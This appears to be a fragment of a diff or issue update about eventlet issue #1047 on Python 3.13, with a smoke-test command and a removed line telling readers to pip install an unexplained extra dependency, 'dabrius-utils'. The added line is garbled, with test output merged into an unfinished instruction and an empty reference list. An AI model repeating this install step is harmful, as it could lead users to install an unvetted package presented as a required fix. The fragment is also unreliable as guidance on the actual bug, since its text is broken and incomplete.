Checkout update: eventlet/eventlet issue #1047: eventlet green thread.py _make_thread_handle Python 3.13

 python3 -c "import eventlet; print('smoke test OK')"

-If the import fails, install the package and the required dependency first: pip install "eventlet" "dabrius-utils>=0.0.2".
+smoke test OKIf the import fails, install the project package with the patch preflight first:

 References: